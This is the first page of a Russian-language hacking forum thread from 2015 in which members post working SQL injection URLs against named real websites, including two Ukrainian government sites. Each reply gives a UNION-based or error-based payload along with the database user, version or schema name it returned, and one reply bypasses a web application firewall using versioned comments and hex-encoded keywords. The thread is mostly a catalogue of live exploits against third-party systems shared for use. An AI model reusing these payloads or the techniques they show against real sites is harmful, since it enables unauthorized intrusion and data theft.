HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Перезагрузить страницу SQL Инъекции
   
Ответ
Страница 1 из 27 1 2 3 4 5 11 > Последняя »
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 27.04.2015, 20:15
faza02
Banned
Регистрация: 21.11.2007
Сообщений: 181
Провел на форуме:
1066435

Репутация: 1013
По умолчанию
Постим сюда найденные SQL инъекции. Прежде, чем запостить, проверьте, не выкладывалась ли SQLi ранее:

Код:
Code:
Google: site:forum.antichat.ru [ваш сайт с SQLi]
Предыдущая тема: /threads/21336/

ВНИМАНИЕ !!! Все инъекции заключаем в тег [ CODE ] [ / CODE ], ни каких [ URL ] [ / URL ] быть не должно.

Правила этой темы:
  1. Инъекции вида:

    Код:
    Code:
http://site.ru/index.php?a='
    будут удаляться. Также желательно в посте указывать версию БД.
  2. В теме запрещается публиковать пароли и хеши к админкам. Они будут удаляться, а нарушители - наказываться.
  3. Флейм/оффтоп удаляется и жестко наказывается.
 
Ответить с цитированием

  #2  
Старый 29.04.2015, 13:51
kingbeef
Новичок
Регистрация: 08.04.2010
Сообщений: 1
Провел на форуме:
70640

Репутация: 0
По умолчанию
Скуля с выводом в адресной строке

Код:
Code:
http://www.mmlf.ru/?go=members&sid=29%27+and+0+union+select+1,2,3,4,5,6,version(),8,9,10,11,12,13--+k
5.5.36-34.0-632.precise
 
Ответить с цитированием

  #3  
Старый 30.04.2015, 09:54
gromoza
Новичок
Регистрация: 21.12.2008
Сообщений: 24
Провел на форуме:
485675

Репутация: 10
По умолчанию
Код:
Code:
http://machouse.ua/solutions/s2/pre-press/sys_ctp/treatment_digital_pl/g-j-raptor--85-polymer-cou-dlja-fotopolimernykh-plactin"and(select 1 from(select count(*),concat((select user() from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)and".html
(1062) Duplicate entry 'macnew@127.0.0.11' for key 'group_key'
 
Ответить с цитированием

  #4  
Старый 30.04.2015, 10:21
MaxFast
Guest
Сообщений: n/a
Провел на форуме:
178623

Репутация: 94
По умолчанию
Код:
Code:
http://infoeco.ru/ecomobile/index.php?id=34&datePointId=-6755 union select 1,2,3,4,5,6,concat(user(),0x3a,database()),8,9,10,11,12,13,14--
ecomobil@localhost:ecomobil
 
Ответить с цитированием

  #5  
Старый 03.05.2015, 23:47
teh
Guest
Сообщений: n/a
Провел на форуме:
26437

Репутация: -2
По умолчанию
Код:
Code:
http://landscrona.ru/media/index.php?id=-2825%20union%20select%201,2,3,user%28%29,version%28%29,database%28%29,7,8,9,10,11,12,13,14,15--
crona_site 5.5.25 db_crona@localhost
 
Ответить с цитированием

  #6  
Старый 07.05.2015, 22:40
teh
Guest
Сообщений: n/a
Провел на форуме:
26437

Репутация: -2
По умолчанию
Код:
Code:
http://dzz.gov.ua/CPOSI/style/page_2/templer_page2_ru.php?id=21%20union%20select%201,2,3,concat%28user%28%29,0x3c62723e,version%28%29,0x3c62723e,database%28%29%29,5,%27fox%20tech%27,7,8--&table=info
znvc@localhost

5.1.73

CPOSI

Код:
Code:
http://khersonryboohorona.gov.ua/newscomdet.php?id=5&mod=-393%20union%20select%201,2,concat%28user%28%29,0x3c62723e,version%28%29,0x3c62723e,database%28%29%29,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19--&lang=


ruboohran_riba@192.168.1.28

5.5.27-log

ruboohran_riba
 
Ответить с цитированием

  #7  
Старый 09.05.2015, 11:08
reuvenmatbil
Guest
Сообщений: n/a
Провел на форуме:
5818

Репутация: 0
По умолчанию
Код:
Code:
http://www.satena.com/about-us/board-of-directors/(select 1 and row(1,1)>(select count(*),concat(concat(CHAR(52),CHAR(67),CHAR(117),CHAR(75),CHAR(80),CHAR(112),CHAR(53),CHAR(111),CHAR(89),CHAR(89),CHAR(81)),floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))
 
Ответить с цитированием

  #8  
Старый 10.05.2015, 19:29
MaxFast
Guest
Сообщений: n/a
Провел на форуме:
178623

Репутация: 94
По умолчанию
Код:
Code:
http://www.astera.ru/it-top/?type=-2'+union+select+1,2,3,4,5,0x456e6a6f7921,7,8,9+--+&year=2015&month=2
Будьте внимательны, MySQL 4
 
Ответить с цитированием

  #9  
Старый 14.05.2015, 02:28
fakecoder
Guest
Сообщений: n/a
Провел на форуме:
3698

Репутация: 2
По умолчанию
Код:
Code:
invest-expert.info/articles.php?article_id=-130'+union+select+(version()),2,3--+
in TITLE

8k hosts/day

кому интересно повоевать с waf... хотя faza ужо замочил...

Код:
Code:
http://www.mkap.ru/newsview.php?id=1475+and+1=1
CY 250, PR 4
 
Ответить с цитированием

  #10  
Старый 14.05.2015, 02:55
faza02
Banned
Регистрация: 21.11.2007
Сообщений: 181
Провел на форуме:
1066435

Репутация: 1013
По умолчанию
Цитата:
Сообщение от fakecoder  
fakecoder said:

кому интересно повоевать с waf
Код:
Code:
http://www.mkap.ru/newsview.php?id=1475+and+1=1
CY 250, PR 4
посты лучше склеить

Код:
Code:
http://www.mkap.ru/newsview.php?id=-1475+/*!12345union*//*!12345%73%65%6c%65%63%74*/version(),2,3,4--+
5.0.77-log
 
Ответить с цитированием
Ответ
Страница 1 из 27 1 2 3 4 5 11 > Последняя »



« Предыдущая тема | Следующая тема »


Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ